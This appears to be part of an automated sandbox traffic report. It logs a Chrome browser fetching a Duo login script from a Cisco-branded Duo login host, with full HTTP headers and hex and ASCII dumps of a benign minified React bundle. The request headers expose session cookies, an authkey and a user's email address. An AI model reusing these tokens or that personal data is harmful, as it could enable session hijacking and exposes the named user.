                                                                                                                                          2024-11-18 05:48:31 UTC2394INData Raw: 6c 65 78 2d 73 74 61 72 74 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 0a 62 6f 64 79 7b 77 69 64 74 68 3a 31 30 30 76 77 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 61 72 67 69 6e 3a 30 7d 23 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 73 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 31 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6c 69 70 3a 72 65 63 74 28 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6c 69 70 2d 70 61 74 68 3a 70 6f 6c 79 67 6f 6e 28 30
                                                                                                                                          Data Ascii: lex-start;-ms-flex-pack:center;justify-content:center}body{width:100vw;height:100vh;margin:0}#screen-reader-announcements{position:absolute !important;height:1px !important;width:1px !important;clip:rect(1px, 1px, 1px, 1px) !important;clip-path:polygon(0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          77192.168.2.166071735.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:31 UTC1048OUTGET /static/js/page/login.js?v=0f15c HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:48:31 UTC628INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:31 GMT
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          Content-Length: 887789
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-d8bed"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-18 05:48:31 UTC15756INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 6c 6f 67 69 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 38 38 36 35 3a 66 75 6e 63 74 69 6f 6e 28 5f 5f 75 6e 75 73 65 64 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 39 31 32 39 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 34 39 31 30 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 33 33 37
                                                                                                                                          Data Ascii: /*! For license information please see login.js.LICENSE.txt */!function(){var __webpack_modules__={8865:function(__unused_webpack_module,exports,__webpack_require__){"use strict";__webpack_require__(9129),__webpack_require__(4910),__webpack_require__(337
                                                                                                                                          2024-11-18 05:48:31 UTC16378INData Raw: 2b 61 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 61 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2c 6f 62 5b 62 5d 3d 6f 62 5b 61 5d 7d 29 29 7d 29 29 3b 76 61 72 20 73 62 3d 41 28 7b 6d 65 6e 75 69 74 65 6d 3a 21 30 7d 2c 7b 61 72 65 61 3a 21 30 2c 62 61 73 65 3a 21 30 2c 62 72 3a 21 30 2c 63 6f 6c 3a 21 30 2c 65 6d 62 65 64 3a 21 30 2c 68 72 3a 21 30 2c 69 6d 67 3a 21 30 2c 69 6e 70 75 74 3a 21 30 2c 6b 65 79 67 65 6e 3a 21 30 2c 6c 69 6e 6b 3a 21 30 2c 6d 65 74 61 3a 21 30 2c 70 61 72 61 6d 3a 21 30 2c 73 6f 75 72 63 65 3a 21 30 2c 74 72 61 63 6b 3a 21 30 2c 77 62 72 3a 21 30 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 74 62 28 61 2c 62 29 7b 69 66 28 62 29 7b 69 66 28 73 62 5b 61 5d 26 26 28 6e 75 6c 6c 21 3d 62 2e 63 68 69 6c 64 72
                                                                                                                                          Data Ascii: +a.charAt(0).toUpperCase()+a.substring(1),ob[b]=ob[a]}))}));var sb=A({menuitem:!0},{area:!0,base:!0,br:!0,col:!0,embed:!0,hr:!0,img:!0,input:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0});function tb(a,b){if(b){if(sb[a]&&(null!=b.childr
                                                                                                                                          2024-11-18 05:48:31 UTC16384INData Raw: 65 79 75 70 22 3d 3d 3d 61 7c 7c 22 6b 65 79 64 6f 77 6e 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 73 65 28 70 65 29 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 61 2c 62 29 7b 69 66 28 22 63 6c 69 63 6b 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 73 65 28 62 29 7d 66 75 6e 63 74 69 6f 6e 20 45 65 28 61 2c 62 29 7b 69 66 28 22 69 6e 70 75 74 22 3d 3d 3d 61 7c 7c 22 63 68 61 6e 67 65 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 73 65 28 62 29 7d 76 61 72 20 47 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 69 73 3f 4f 62 6a 65 63 74 2e 69 73 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 30 21 3d 3d 61 7c 7c 31 2f 61 3d 3d 31 2f 62 29 7c 7c 61 21 3d 61 26 26 62 21 3d 62 7d 3b 66 75 6e 63 74 69 6f
                                                                                                                                          Data Ascii: eyup"===a||"keydown"===a)return se(pe)}function De(a,b){if("click"===a)return se(b)}function Ee(a,b){if("input"===a||"change"===a)return se(b)}var Ge="function"==typeof Object.is?Object.is:function(a,b){return a===b&&(0!==a||1/a==1/b)||a!=a&&b!=b};functio
                                                                                                                                          2024-11-18 05:48:31 UTC16384INData Raw: 3d 61 3b 29 7b 76 61 72 20 64 3d 61 2e 61 6c 74 65 72 6e 61 74 65 3b 69 66 28 28 61 2e 63 68 69 6c 64 4c 61 6e 65 73 26 62 29 21 3d 3d 62 3f 28 61 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 62 2c 6e 75 6c 6c 21 3d 3d 64 26 26 28 64 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 62 29 29 3a 6e 75 6c 6c 21 3d 3d 64 26 26 28 64 2e 63 68 69 6c 64 4c 61 6e 65 73 26 62 29 21 3d 3d 62 26 26 28 64 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 62 29 2c 61 3d 3d 3d 63 29 62 72 65 61 6b 3b 61 3d 61 5b 22 72 65 74 75 72 6e 22 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 67 28 61 2c 62 29 7b 6d 67 3d 61 2c 6f 67 3d 6e 67 3d 6e 75 6c 6c 2c 6e 75 6c 6c 21 3d 3d 28 61 3d 61 2e 64 65 70 65 6e 64 65 6e 63 69 65 73 29 26 26 6e 75 6c 6c 21 3d 3d 61 2e 66 69 72 73 74 43 6f 6e 74 65 78 74 26 26 28 30
                                                                                                                                          Data Ascii: =a;){var d=a.alternate;if((a.childLanes&b)!==b?(a.childLanes|=b,null!==d&&(d.childLanes|=b)):null!==d&&(d.childLanes&b)!==b&&(d.childLanes|=b),a===c)break;a=a["return"]}}function sg(a,b){mg=a,og=ng=null,null!==(a=a.dependencies)&&null!==a.firstContext&&(0
                                                                                                                                          2024-11-18 05:48:31 UTC16384INData Raw: 7d 69 66 28 6e 75 6c 6c 21 3d 3d 65 29 7b 66 3d 65 2e 6e 65 78 74 2c 64 3d 64 2e 62 61 73 65 53 74 61 74 65 3b 76 61 72 20 68 3d 67 3d 6e 75 6c 6c 2c 6b 3d 6e 75 6c 6c 2c 6c 3d 66 3b 64 6f 7b 76 61 72 20 6e 3d 6c 2e 6c 61 6e 65 3b 69 66 28 28 4f 68 26 6e 29 3d 3d 3d 6e 29 6e 75 6c 6c 21 3d 3d 6b 26 26 28 6b 3d 6b 2e 6e 65 78 74 3d 7b 6c 61 6e 65 3a 30 2c 61 63 74 69 6f 6e 3a 6c 2e 61 63 74 69 6f 6e 2c 68 61 73 45 61 67 65 72 53 74 61 74 65 3a 6c 2e 68 61 73 45 61 67 65 72 53 74 61 74 65 2c 65 61 67 65 72 53 74 61 74 65 3a 6c 2e 65 61 67 65 72 53 74 61 74 65 2c 6e 65 78 74 3a 6e 75 6c 6c 7d 29 2c 64 3d 6c 2e 68 61 73 45 61 67 65 72 53 74 61 74 65 3f 6c 2e 65 61 67 65 72 53 74 61 74 65 3a 61 28 64 2c 6c 2e 61 63 74 69 6f 6e 29 3b 65 6c 73 65 7b 76 61 72 20
                                                                                                                                          Data Ascii: }if(null!==e){f=e.next,d=d.baseState;var h=g=null,k=null,l=f;do{var n=l.lane;if((Oh&n)===n)null!==k&&(k=k.next={lane:0,action:l.action,hasEagerState:l.hasEagerState,eagerState:l.eagerState,next:null}),d=l.hasEagerState?l.eagerState:a(d,l.action);else{var
                                                                                                                                          2024-11-18 05:48:31 UTC16384INData Raw: 68 69 6c 64 29 7b 63 2e 63 68 69 6c 64 5b 22 72 65 74 75 72 6e 22 5d 3d 63 2c 63 3d 63 2e 63 68 69 6c 64 3b 63 6f 6e 74 69 6e 75 65 7d 69 66 28 63 3d 3d 3d 62 29 62 72 65 61 6b 3b 66 6f 72 28 3b 6e 75 6c 6c 3d 3d 3d 63 2e 73 69 62 6c 69 6e 67 3b 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 63 5b 22 72 65 74 75 72 6e 22 5d 7c 7c 63 5b 22 72 65 74 75 72 6e 22 5d 3d 3d 3d 62 29 72 65 74 75 72 6e 3b 63 3d 63 5b 22 72 65 74 75 72 6e 22 5d 7d 63 2e 73 69 62 6c 69 6e 67 5b 22 72 65 74 75 72 6e 22 5d 3d 63 5b 22 72 65 74 75 72 6e 22 5d 2c 63 3d 63 2e 73 69 62 6c 69 6e 67 7d 7d 2c 55 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 56 69 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 61 2e 6d 65 6d 6f 69 7a 65 64 50 72 6f 70 73 3b 69 66 28 65 21 3d
                                                                                                                                          Data Ascii: hild){c.child["return"]=c,c=c.child;continue}if(c===b)break;for(;null===c.sibling;){if(null===c["return"]||c["return"]===b)return;c=c["return"]}c.sibling["return"]=c["return"],c=c.sibling}},Ui=function(){},Vi=function(a,b,c,d){var e=a.memoizedProps;if(e!=
                                                                                                                                          2024-11-18 05:48:32 UTC16384INData Raw: 74 63 68 28 6d 29 7b 55 28 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 2c 6d 29 7d 74 72 79 7b 4e 6a 28 35 2c 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 29 7d 63 61 74 63 68 28 6d 29 7b 55 28 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 2c 6d 29 7d 7d 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 61 6b 28 62 2c 61 29 2c 63 6b 28 61 29 2c 35 31 32 26 64 26 26 6e 75 6c 6c 21 3d 3d 63 26 26 4a 6a 28 63 2c 63 5b 22 72 65 74 75 72 6e 22 5d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 3a 69 66 28 61 6b 28 62 2c 61 29 2c 63 6b 28 61 29 2c 35 31 32 26 64 26 26 6e 75 6c 6c 21 3d 3d 63 26 26 4a 6a 28 63 2c 63 5b 22 72 65 74 75 72 6e 22 5d 29 2c 33 32 26 61 2e 66 6c 61 67 73 29 7b 76 61 72 20 65 3d 61 2e 73 74 61 74 65 4e 6f 64 65 3b 74 72 79 7b 6e 62 28 65 2c 22 22 29 7d 63 61 74 63 68 28
                                                                                                                                          Data Ascii: tch(m){U(a,a["return"],m)}try{Nj(5,a,a["return"])}catch(m){U(a,a["return"],m)}}break;case 1:ak(b,a),ck(a),512&d&&null!==c&&Jj(c,c["return"]);break;case 5:if(ak(b,a),ck(a),512&d&&null!==c&&Jj(c,c["return"]),32&a.flags){var e=a.stateNode;try{nb(e,"")}catch(
                                                                                                                                          2024-11-18 05:48:32 UTC16384INData Raw: 7d 7d 7d 76 61 72 20 6d 3d 66 2e 61 6c 74 65 72 6e 61 74 65 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6d 29 7b 76 61 72 20 77 3d 6d 2e 63 68 69 6c 64 3b 69 66 28 6e 75 6c 6c 21 3d 3d 77 29 7b 6d 2e 63 68 69 6c 64 3d 6e 75 6c 6c 3b 64 6f 7b 76 61 72 20 4a 3d 77 2e 73 69 62 6c 69 6e 67 3b 77 2e 73 69 62 6c 69 6e 67 3d 6e 75 6c 6c 2c 77 3d 4a 7d 77 68 69 6c 65 28 6e 75 6c 6c 21 3d 3d 77 29 7d 7d 54 3d 66 7d 7d 69 66 28 30 21 3d 28 32 30 36 34 26 66 2e 73 75 62 74 72 65 65 46 6c 61 67 73 29 26 26 6e 75 6c 6c 21 3d 3d 67 29 67 5b 22 72 65 74 75 72 6e 22 5d 3d 66 2c 54 3d 67 3b 65 6c 73 65 20 62 3a 66 6f 72 28 3b 6e 75 6c 6c 21 3d 3d 54 3b 29 7b 69 66 28 30 21 3d 28 32 30 34 38 26 28 66 3d 54 29 2e 66 6c 61 67 73 29 29 73 77 69 74 63 68 28 66 2e 74 61 67 29 7b 63 61 73
                                                                                                                                          Data Ascii: }}}var m=f.alternate;if(null!==m){var w=m.child;if(null!==w){m.child=null;do{var J=w.sibling;w.sibling=null,w=J}while(null!==w)}}T=f}}if(0!=(2064&f.subtreeFlags)&&null!==g)g["return"]=f,T=g;else b:for(;null!==T;){if(0!=(2048&(f=T).flags))switch(f.tag){cas
                                                                                                                                          2024-11-18 05:48:32 UTC16384INData Raw: 65 5f 5f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 21 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 44 43 45 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2e 63 68 65 63 6b 44 43 45 29 74 72 79 7b 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2e 63 68 65 63 6b 44 43 45 28 63 68 65 63 6b 44 43 45 29 7d 63 61 74 63 68 28 65 72 72 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 72 72 29 7d 7d 28 29 2c 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73
                                                                                                                                          Data Ascii: e__){"use strict";!function checkDCE(){if("undefined"!=typeof __REACT_DEVTOOLS_GLOBAL_HOOK__&&"function"==typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE)try{__REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE(checkDCE)}catch(err){console.error(err)}}(),module.exports
                                                                                                                                          2024-11-18 05:48:32 UTC16384INData Raw: 75 65 73 74 22 2c 22 e2 97 83 22 3a 22 6c 74 72 69 22 2c 22 e2 a6 96 22 3a 22 6c 74 72 50 61 72 22 2c 22 e2 a5 8a 22 3a 22 6c 75 72 64 73 68 61 72 22 2c 22 e2 a5 a6 22 3a 22 6c 75 72 75 68 61 72 22 2c 22 e2 89 a8 ef b8 80 22 3a 22 6c 76 6e 45 22 2c 22 c2 af 22 3a 22 6d 61 63 72 22 2c 22 e2 99 82 22 3a 22 6d 61 6c 65 22 2c 22 e2 9c a0 22 3a 22 6d 61 6c 74 22 2c 22 e2 a4 85 22 3a 22 4d 61 70 22 2c 22 e2 86 a6 22 3a 22 6d 61 70 22 2c 22 e2 86 a5 22 3a 22 6d 61 70 73 74 6f 75 70 22 2c 22 e2 96 ae 22 3a 22 6d 61 72 6b 65 72 22 2c 22 e2 a8 a9 22 3a 22 6d 63 6f 6d 6d 61 22 2c 22 d0 9c 22 3a 22 4d 63 79 22 2c 22 d0 bc 22 3a 22 6d 63 79 22 2c 22 e2 80 94 22 3a 22 6d 64 61 73 68 22 2c 22 e2 88 ba 22 3a 22 6d 44 44 6f 74 22 2c 22 e2 81 9f 22 3a 22 4d 65 64 69 75 6d
                                                                                                                                          Data Ascii: uest","":"ltri","":"ltrPar","":"lurdshar","":"luruhar","":"lvnE","":"macr","":"male","":"malt","":"Map","":"map","":"mapstoup","":"marker","":"mcomma","":"Mcy","":"mcy","":"mdash","":"mDDot","":"Medium


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          78192.168.2.166071852.223.1.1634436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:34 UTC787OUTGET /static/js/page/login.js?v=0f15c HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:48:34 UTC628INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:34 GMT
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          Content-Length: 887789
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-d8bed"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-18 05:48:34 UTC15756INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 6c 6f 67 69 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 38 38 36 35 3a 66 75 6e 63 74 69 6f 6e 28 5f 5f 75 6e 75 73 65 64 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 39 31 32 39 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 34 39 31 30 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 33 33 37
                                                                                                                                          Data Ascii: /*! For license information please see login.js.LICENSE.txt */!function(){var __webpack_modules__={8865:function(__unused_webpack_module,exports,__webpack_require__){"use strict";__webpack_require__(9129),__webpack_require__(4910),__webpack_require__(337
                                                                                                                                          2024-11-18 05:48:34 UTC16378INData Raw: 2b 61 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 61 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2c 6f 62 5b 62 5d 3d 6f 62 5b 61 5d 7d 29 29 7d 29 29 3b 76 61 72 20 73 62 3d 41 28 7b 6d 65 6e 75 69 74 65 6d 3a 21 30 7d 2c 7b 61 72 65 61 3a 21 30 2c 62 61 73 65 3a 21 30 2c 62 72 3a 21 30 2c 63 6f 6c 3a 21 30 2c 65 6d 62 65 64 3a 21 30 2c 68 72 3a 21 30 2c 69 6d 67 3a 21 30 2c 69 6e 70 75 74 3a 21 30 2c 6b 65 79 67 65 6e 3a 21 30 2c 6c 69 6e 6b 3a 21 30 2c 6d 65 74 61 3a 21 30 2c 70 61 72 61 6d 3a 21 30 2c 73 6f 75 72 63 65 3a 21 30 2c 74 72 61 63 6b 3a 21 30 2c 77 62 72 3a 21 30 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 74 62 28 61 2c 62 29 7b 69 66 28 62 29 7b 69 66 28 73 62 5b 61 5d 26 26 28 6e 75 6c 6c 21 3d 62 2e 63 68 69 6c 64 72
                                                                                                                                          Data Ascii: +a.charAt(0).toUpperCase()+a.substring(1),ob[b]=ob[a]}))}));var sb=A({menuitem:!0},{area:!0,base:!0,br:!0,col:!0,embed:!0,hr:!0,img:!0,input:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0});function tb(a,b){if(b){if(sb[a]&&(null!=b.childr
                                                                                                                                          2024-11-18 05:48:34 UTC16384INData Raw: 65 79 75 70 22 3d 3d 3d 61 7c 7c 22 6b 65 79 64 6f 77 6e 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 73 65 28 70 65 29 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 61 2c 62 29 7b 69 66 28 22 63 6c 69 63 6b 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 73 65 28 62 29 7d 66 75 6e 63 74 69 6f 6e 20 45 65 28 61 2c 62 29 7b 69 66 28 22 69 6e 70 75 74 22 3d 3d 3d 61 7c 7c 22 63 68 61 6e 67 65 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 73 65 28 62 29 7d 76 61 72 20 47 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 69 73 3f 4f 62 6a 65 63 74 2e 69 73 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 30 21 3d 3d 61 7c 7c 31 2f 61 3d 3d 31 2f 62 29 7c 7c 61 21 3d 61 26 26 62 21 3d 62 7d 3b 66 75 6e 63 74 69 6f
                                                                                                                                          Data Ascii: eyup"===a||"keydown"===a)return se(pe)}function De(a,b){if("click"===a)return se(b)}function Ee(a,b){if("input"===a||"change"===a)return se(b)}var Ge="function"==typeof Object.is?Object.is:function(a,b){return a===b&&(0!==a||1/a==1/b)||a!=a&&b!=b};functio
                                                                                                                                          2024-11-18 05:48:34 UTC16384INData Raw: 3d 61 3b 29 7b 76 61 72 20 64 3d 61 2e 61 6c 74 65 72 6e 61 74 65 3b 69 66 28 28 61 2e 63 68 69 6c 64 4c 61 6e 65 73 26 62 29 21 3d 3d 62 3f 28 61 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 62 2c 6e 75 6c 6c 21 3d 3d 64 26 26 28 64 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 62 29 29 3a 6e 75 6c 6c 21 3d 3d 64 26 26 28 64 2e 63 68 69 6c 64 4c 61 6e 65 73 26 62 29 21 3d 3d 62 26 26 28 64 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 62 29 2c 61 3d 3d 3d 63 29 62 72 65 61 6b 3b 61 3d 61 5b 22 72 65 74 75 72 6e 22 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 67 28 61 2c 62 29 7b 6d 67 3d 61 2c 6f 67 3d 6e 67 3d 6e 75 6c 6c 2c 6e 75 6c 6c 21 3d 3d 28 61 3d 61 2e 64 65 70 65 6e 64 65 6e 63 69 65 73 29 26 26 6e 75 6c 6c 21 3d 3d 61 2e 66 69 72 73 74 43 6f 6e 74 65 78 74 26 26 28 30
                                                                                                                                          Data Ascii: =a;){var d=a.alternate;if((a.childLanes&b)!==b?(a.childLanes|=b,null!==d&&(d.childLanes|=b)):null!==d&&(d.childLanes&b)!==b&&(d.childLanes|=b),a===c)break;a=a["return"]}}function sg(a,b){mg=a,og=ng=null,null!==(a=a.dependencies)&&null!==a.firstContext&&(0
